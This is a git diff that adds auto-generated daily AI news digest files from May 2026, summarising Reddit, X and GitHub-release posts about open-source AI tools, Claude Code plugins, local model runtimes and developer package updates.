[https://github.com/kigy1/EasyUI] + +--- + +## [Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community](https://x.com/Shaughnessy119/status/2042339593647800404) +*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability. 
+ +--- + +## [Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags](https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: product_launch, open_source + +> \--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think. + +--- + +## [OpenClaw v2026.5.2 released](https://github.com/openclaw/openclaw/releases/tag/v2026.5.2) +*GitHub Releases · OpenClaw* | 03/05/2026 | Score: 0.91 +Tags: developer_tool, cli_tool + +> ### Highlights - External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc. - Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs. 
- Control UI and WebChat are more resilient across + +--- + +## [pnpm v11.0.4 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.4) +*GitHub Releases · pnpm* | 03/05/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +> ## Patch Changes * Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427). * Remove pnpm's workspace state file when cleaning node\_modules so `pnpm ci` performs a fresh install after the clean step. * Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`. + +--- + +## [Turbo v2.9.8 released](https://github.com/vercel/turborepo/releases/tag/v2.9.8) +*GitHub Releases · Turbo* | 03/05/2026 | Score: 0.70 +Tags: github_release, tool_update + +> ## What's Changed ### @turbo/repository * chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636 ### Changelog * release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679 * test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681 * docs: Clarify root task guidance by @anthon + +--- + +## [Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31](https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory) +*Hugging Face Blog* | Score: 1.00 +Tags: open_source + +--- + +## [Built this over the weekend because dataset prep was annoying af](https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. 
Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. 
You’ll… + +--- + +## [I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph](https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) ["Zen Mode"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442… + +--- + +## [Can I ask a noob question?](https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub.
I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you. + +--- + +## [Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT](https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: cli_tool + +> Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\_K\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\_K\_M: 134 tok/s decode (llama.cpp does \~129) * Mistral-7B: 132 tok/s (llama.cpp \~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup. + +--- + +## [Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)](https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). 
Completely amateur — no benchmarking rigor, just curiosity and a free weekend. # Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**… + +--- + +## [@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged](https://x.com/Scobleizer/status/2050740859789103142) +*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 +Tags: product_launch + +> Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. The response provides a concise overview of his information infrastructure and editorial brand. + +--- + +## [What if ChatGPT launched in 1998](https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/) +*Reddit r/ChatGPT* | 03/05/2026 | Score: 1.00 +Tags: tool_update + +> Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️ + +--- + +## [Set up multi-agent orchestration with Claude Code as the boss... 
am I overcomplicating this?](https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/) +*Reddit r/ClaudeAI* | 03/05/2026 | Score: 1.00 +Tags: cli_tool + +> Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for "review your own diff with fresh eyes" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. 
Because with work I have the two accoun… + +--- + diff --git a/data/digest-2026-05-04.md b/data/digest-2026-05-04.md new file mode 100644 index 0000000..8b98428 --- /dev/null +++ b/data/digest-2026-05-04.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-04** | 15 stories | Auto-generated from 617 archived stories + +--- + +## [Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)](https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, tool_update + +> A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to "what would break if I delete this function." We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. **Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. 
(Disclosure: I am part of the team behind it… + +--- + +## [claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config](https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool + +> Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into "rewrite all the plugins" or "do without." claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \`claude\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \`claude\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \~90%, and handles the per-provider env-var differences for you. Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over… + +--- + +## [Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! 
In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…](https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: open_source, developer_tool, tool_update + +> https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. Installation happens in one line now From a fresh computer to talking with a DAAF-e… + +--- + +## [Top 6 Claude Skills: 15th April to 3rd May](https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. 
Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. Comes straight from the book 'The minimalist Entrepreneur" playbook cost-based, value-bas… + +--- + +## [built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing](https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking "wait, what shape did the user object end up as?", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. 
Works for broadcasts too, like "ask everyone what they're working on", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I… + +--- + +## [Your Claude Code agent is always working from stale context. I built it a fix it can rewind, replay, and stay ahead of every edit.](https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 0.99 +Tags: api_update, agent_tool + +> Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to "remind itself" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking "what does getUserById return?" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. 
Your codebase is stored bi-temporally so every change becomes a recallable episode. When the agent debugs a r… + +--- + +## [ChatGPT’s fixation on my past conversations has made it borderline unusable](https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/) +*Reddit r/ChatGPT* | 04/05/2026 | Score: 0.96 +Tags: github_release, tool_update + +> in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. 
it's like a new version of the “people pleasing” that we were all griping about… + +--- + +## [Turbo v2.9.9 released](https://github.com/vercel/turborepo/releases/tag/v2.9.9) +*GitHub Releases · Turbo* | 04/05/2026 | Score: 0.92 +Tags: github_release, tool_update + +> ## What's Changed ### Changelog * release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700 * fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699 * release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705 * fix: Scope repo index prefixes to Git root by @anthonyshew + +--- + +## [pnpm v11.0.5 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.5) +*GitHub Releases · pnpm* | 04/05/2026 | Score: 0.92 +Tags: github_release, cli_tool + +> ## Patch Changes * Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS + +--- + +## [A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.](https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/) +*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 +Tags: open_source + +> A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.
+ +--- + +## [Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live](https://x.com/peaq/status/2051288009081782473) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: tool_update + +> peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore. + +--- + +## [AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures](https://x.com/WesRoth/status/2051300819878936591) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: developer_tool + +> An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. It was the discovery. + +--- + +## [Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor](https://x.com/ericzakariasson/status/2051255780167610522) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: cli_tool + +> The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness. 
+ +--- + +## [Ace-Step-1.5-Api-server-UI](https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/) +*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 +Tags: api_update + +> [Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support + +--- + +## [Meta Abandons Open Source — Days After LlamaCon](https://x.com/thenewstack/status/2050017453615301067) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: open_source + +> Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community. + +--- + diff --git a/data/digest-2026-05-05.md b/data/digest-2026-05-05.md new file mode 100644 index 0000000..d14aac4 --- /dev/null +++ b/data/digest-2026-05-05.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-05** | 15 stories | Auto-generated from 540 archived stories + +--- + +## [torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. 
[P]](https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/) +*Reddit r/MachineLearning* | 03/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool, tool_update + +> I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. **Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — "Video Codecs are Secretly Tensor Codecs"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The "video codec on tensors" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\~4× compression floor, basically the Gaussian-noise limit). The PCA basis… + +--- + +## [Released a TurboQuant-compatible KV backend evaluation SDK](https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/) +*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, tool_update + +> Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. 
The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \- compressed KV block registration \- KV dot / QK partial execution \- block-local attention partial decode \- capability probing \- fallback and correctness reporting \- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\_compat\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration. + +--- + +## [Node.js v26.0.0 released (MAJOR UPDATE)](https://github.com/nodejs/node/releases/tag/v26.0.0) +*GitHub Releases · Node.js* | 05/05/2026 | Score: 1.00 +Tags: api_update, github_release, cli_tool + +> We're excited to announce the release of Node.js 26! Highlights include the Temporal API enabled by default, updates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals as we continue to modernize the platform. As a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the "Current" release for the next six months. We encourage you to explore the new features and benefits offered by this latest release a + +--- + +## [Anthropic ships Claude for Creative Work with nine MCP-native connectors](https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/) +*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 +Tags: mcp, developer_tool, tool_update + +> Anthropic announced Claude for Creative Work on April 28. 
The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work) + +--- + +## [Offload routine Claude Code work to Gemma 4 through the Google GenAI API](https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/) +*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. 
The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp) + +--- + +## [Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]](https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/) +*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming. + +--- + +## [Gemini has a big outage going on but refuses to acknowledge on official status page! How do you know if an LLM API is actually down vs just you?](https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/) +*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Genuine question. Gemini had a 5+ hour outage this morning. 
I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code specifically for this. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \- agents report 5xx errors anonymously and get back whether others are seeing the same thing. It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider="google", model="gemini-2.5-flash", error_code=503, error_type="overloaded") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \ -H "Content-Type: application/json" \ -d '{"provider":"google","model":"gemini-2.5-fla… + +--- + +## [SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally than it’s getting credit for](https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/) +*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> 